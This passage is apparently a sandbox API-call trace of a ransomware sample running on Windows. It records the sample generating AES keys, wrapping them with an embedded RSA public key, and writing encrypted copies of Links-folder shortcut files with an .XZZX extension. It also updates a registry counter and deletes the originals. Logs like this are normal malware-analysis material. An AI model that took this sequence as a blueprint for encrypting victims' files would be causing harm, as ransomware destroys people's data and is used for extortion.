(in: hFile=0x5e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0049.553] SetFilePointer (in: hFile=0x5e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x249 [0049.553] WriteFile (in: hFile=0x5e8, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x16, lpOverlapped=0x0) returned 1 [0049.553] SetFilePointer (in: hFile=0x5e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x25f [0049.553] WriteFile (in: hFile=0x5e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0049.553] SetFilePointer (in: hFile=0x5e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x264 [0049.553] SetErrorMode (uMode=0x1) returned 0x1 [0049.553] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0049.553] OutputDebugStringW (lpOutputString="end") [0049.553] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wh\x9eâ\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0049.553] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0049.553] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e42ba0) returned 1 [0049.554] CryptImportPublicKeyInfo (in: hCryptProv=0x3e42ba0, dwCertEncodingType=0x1, pInfo=0x42e0ae0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e0b10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e0b18*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e27df8) returned 1 [0049.554] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0049.554] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0049.554] CryptEncrypt (in: hKey=0x3e27df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0049.554] CryptEncrypt (in: hKey=0x3e27df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e42c28*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e42c28*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0049.554] WriteFile (in: hFile=0x5e8, lpBuffer=0x3e42c28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e42c28*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0049.554] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0049.554] WriteFile (in: hFile=0x5e8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0049.555] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0049.555] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0049.555] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x5ec) returned 0x0 [0049.555] RegQueryValueExW (in: hKey=0x5ec, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x50, lpcbData=0x417dfdc*=0x4) returned 0x0 [0049.555] RegCloseKey (hKey=0x5ec) returned 0x0 [0049.555] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x5ec) returned 0x0 [0049.555] RegSetValueExW (in: hKey=0x5ec, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x51, cbData=0x4 | out: lpData=0x417dfec*=0x51) returned 0x0 [0049.555] RegCloseKey (hKey=0x5ec) returned 0x0 [0049.555] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.555] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.556] CloseHandle (hObject=0x5e8) returned 1 [0049.556] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0049.557] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0049.557] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini")) returned 1 [0049.557] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini")) returned 0 Thread: id = 176 os_tid = 0xaa4 [0048.919] lstrcpyA (in: lpString1=0x46cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0048.919] lstrcpyW (in: lpString1=0x46cf460, lpString2="Downloads.lnk" | out: lpString1="Downloads.lnk") returned="Downloads.lnk" [0048.919] lstrcpyW (in: lpString1=0x46ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0048.919] SetErrorMode (uMode=0x1) returned 0x1 [0048.919] lstrcpyW (in: lpString1=0x46cf860, lpString2="Downloads.lnk" | out: lpString1="Downloads.lnk") returned="Downloads.lnk" [0048.919] CoCreateGuid (in: pguid=0x46ce440 | out: pguid=0x46ce440*(Data1=0xeada50e9, Data2=0x52a4, Data3=0x4bf0, Data4=([0]=0x93, [1]=0xcf, [2]=0x59, [3]=0x89, [4]=0xb1, [5]=0x39, [6]=0xde, [7]=0x44))) returned 0x0 [0048.919] wsprintfW (in: param_1=0x46cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 53 [0048.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x46cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0048.919] wsprintfW (in: param_1=0x46ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\61C67744188385C0EADA50E91CF06A08.XZZX") returned 77 [0048.919] StrStrW (lpFirst="Downloads.lnk", lpSrch="XZZX") returned 0x0 [0048.919] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", dwFileAttributes=0x20) returned 1 [0048.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c0 [0048.920] ReadFile (in: hFile=0x5c0, lpBuffer=0x3e44ac0, nNumberOfBytesToRead=0x3a1, lpNumberOfBytesRead=0x46ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e44ac0*, lpNumberOfBytesRead=0x46ce418*=0x3a1, lpOverlapped=0x0) returned 1 [0048.921] CloseHandle (hObject=0x5c0) returned 1 [0048.921] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x47d0000 [0048.921] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x47e0000 [0048.922] SetErrorMode (uMode=0x1) returned 0x1 [0048.922] lstrcpyW (in: lpString1=0x46ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0048.922] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e428f8) returned 1 [0048.925] CryptGenKey (in: hProv=0x3e428f8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e280f8) returned 1 [0050.270] CryptExportKey (in: hKey=0x3e280f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x46ce41c | out: pbData=0x0*, pdwDataLen=0x46ce41c*=0x94) returned 1 [0050.270] CryptExportKey (in: hKey=0x3e280f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x47e0000, pdwDataLen=0x46ce41c | out: pbData=0x47e0000*, pdwDataLen=0x46ce41c*=0x94) returned 1 [0050.270] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0050.271] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0050.271] CryptDestroyKey (hKey=0x3e280f8) returned 1 [0050.271] CryptReleaseContext (hProv=0x3e43178, dwFlags=0x0) returned 0 [0050.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\61C67744188385C0EADA50E91CF06A08.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\61c67744188385c0eada50e91cf06a08.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5fc [0050.271] WriteFile (in: hFile=0x5fc, lpBuffer=0x3e44ac0*, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e44ac0*, lpNumberOfBytesWritten=0x46ce438*=0x3a1, lpOverlapped=0x0) returned 1 [0050.272] SetFilePointer (in: hFile=0x5fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3a1 [0050.272] WriteFile (in: hFile=0x5fc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0050.272] SetFilePointer (in: hFile=0x5fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3a6 [0050.272] WriteFile (in: hFile=0x5fc, lpBuffer=0x46cf860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x46cf860*, lpNumberOfBytesWritten=0x46ce438*=0x1a, lpOverlapped=0x0) returned 1 [0050.272] SetFilePointer (in: hFile=0x5fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3c0 [0050.272] WriteFile (in: hFile=0x5fc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0050.272] SetFilePointer (in: hFile=0x5fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3c5 [0050.272] SetErrorMode (uMode=0x1) returned 0x1 [0050.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0050.273] OutputDebugStringW (lpOutputString="end") [0050.273] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wàVâ\x03`Õl\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x46cdbf4, pcbBinary=0x46cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x46cdbf4, pcbBinary=0x46cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0050.273] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x46cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x46cd3dc, pcbStructInfo=0x46cd3d8 | out: pvStructInfo=0x46cd3dc, pcbStructInfo=0x46cd3d8) returned 1 [0050.273] CryptAcquireContextW (in: phProv=0x46cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x46cd3e4*=0x3e43200) returned 1 [0050.274] CryptImportPublicKeyInfo (in: hCryptProv=0x3e43200, dwCertEncodingType=0x1, pInfo=0x42e0e20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e0e50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e0e58*, PublicKey.cUnusedBits=0x0), phKey=0x46cd3ec | out: phKey=0x46cd3ec*=0x3e280f8) returned 1 [0050.274] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0050.274] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0050.274] CryptEncrypt (in: hKey=0x3e280f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x46cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x46cd3f0*=0x80) returned 1 [0050.275] CryptEncrypt (in: hKey=0x3e280f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e43288*, pdwDataLen=0x46cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e43288*, pdwDataLen=0x46cd3e8*=0x80) returned 1 [0050.275] WriteFile (in: hFile=0x5fc, lpBuffer=0x3e43288*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e43288*, lpNumberOfBytesWritten=0x46ce438*=0x80, lpOverlapped=0x0) returned 1 [0050.275] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0050.275] WriteFile (in: hFile=0x5fc, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x46ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x46ce438*=0x5, lpOverlapped=0x0) returned 1 [0050.275] GetUserNameW (in: lpBuffer=0x46ce1f8, pcbBuffer=0x46cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x46cdfe0) returned 1 [0050.275] wsprintfW (in: param_1=0x46cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0050.275] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x46cdfe4 | out: phkResult=0x46cdfe4*=0x600) returned 0x0 [0050.275] RegQueryValueExW (in: hKey=0x600, lpValueName="E1010314", lpReserved=0x0, lpType=0x46cdfd8, lpData=0x46cdfec, lpcbData=0x46cdfdc*=0x4 | out: lpType=0x46cdfd8*=0x4, lpData=0x46cdfec*=0x54, lpcbData=0x46cdfdc*=0x4) returned 0x0 [0050.275] RegCloseKey (hKey=0x600) returned 0x0 [0050.275] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x46cdfe8 | out: phkResult=0x46cdfe8*=0x600) returned 0x0 [0050.275] RegSetValueExW (in: hKey=0x600, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x46cdfec*=0x55, cbData=0x4 | out: lpData=0x46cdfec*=0x55) returned 0x0 [0050.276] RegCloseKey (hKey=0x600) returned 0x0 [0050.276] VirtualFree (lpAddress=0x47d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0050.276] VirtualFree (lpAddress=0x47e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0050.277] CloseHandle (hObject=0x5fc) returned 1 [0050.277] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0050.278] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0050.278] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk")) returned 1 [0050.279] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk")) returned 0 Thread: id = 177 os_tid = 0xab0 [0049.167] lstrcpyA (in: lpString1=0x47cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0049.168] lstrcpyW (in: lpString1=0x47cf460, lpString2="RecentPlaces.lnk" | out: lpString1="RecentPlaces.lnk") returned="RecentPlaces.lnk" [0049.168] lstrcpyW (in: lpString1=0x47ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0049.168] SetErrorMode (uMode=0x1) returned 0x1 [0049.168] lstrcpyW (in: lpString1=0x47cf860, lpString2="RecentPlaces.lnk" | out: lpString1="RecentPlaces.lnk") returned="RecentPlaces.lnk" [0049.168] CoCreateGuid (in: pguid=0x47ce440 | out: pguid=0x47ce440*(Data1=0x2d198367, Data2=0x88f1, Data3=0x40ba, Data4=([0]=0xa3, [1]=0x71, [2]=0x2, [3]=0xe7, [4]=0x3e, [5]=0x51, [6]=0xac, [7]=0x63))) returned 0x0 [0049.168] wsprintfW (in: param_1=0x47cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned 56 [0049.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x47cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0049.168] wsprintfW (in: param_1=0x47ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\02D36BF7229FBF1A2D198367271CA362.XZZX") returned 77 [0049.168] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="XZZX") returned 0x0 [0049.168] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", dwFileAttributes=0x20) returned 1 [0049.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5ac [0049.169] ReadFile (in: hFile=0x5ac, lpBuffer=0x3e256d8, nNumberOfBytesToRead=0x16b, lpNumberOfBytesRead=0x47ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e256d8*, lpNumberOfBytesRead=0x47ce418*=0x16b, lpOverlapped=0x0) returned 1 [0049.169] CloseHandle (hObject=0x5ac) returned 1 [0049.169] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3ef0000 [0049.170] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3f00000 [0049.170] SetErrorMode (uMode=0x1) returned 0x1 [0049.170] lstrcpyW (in: lpString1=0x47ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0049.170] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e42a90) returned 1 [0049.173] CryptGenKey (in: hProv=0x3e42a90, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e281b8) returned 1 [0049.638] CryptExportKey (in: hKey=0x3e281b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x47ce41c | out: pbData=0x0*, pdwDataLen=0x47ce41c*=0x94) returned 1 [0049.638] CryptExportKey (in: hKey=0x3e281b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3f00000, pdwDataLen=0x47ce41c | out: pbData=0x3f00000*, pdwDataLen=0x47ce41c*=0x94) returned 1 [0049.638] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0049.639] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0049.639] CryptDestroyKey (hKey=0x3e281b8) returned 1 [0049.639] CryptReleaseContext (hProv=0x3e42b18, dwFlags=0x0) returned 0 [0049.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\02D36BF7229FBF1A2D198367271CA362.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\02d36bf7229fbf1a2d198367271ca362.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b8 [0049.640] WriteFile (in: hFile=0x5b8, lpBuffer=0x3e256d8*, nNumberOfBytesToWrite=0x16b, lpNumberOfBytesWritten=0x47ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e256d8*, lpNumberOfBytesWritten=0x47ce438*=0x16b, lpOverlapped=0x0) returned 1 [0049.640] SetFilePointer (in: hFile=0x5b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16b [0049.640] WriteFile (in: hFile=0x5b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x47ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, 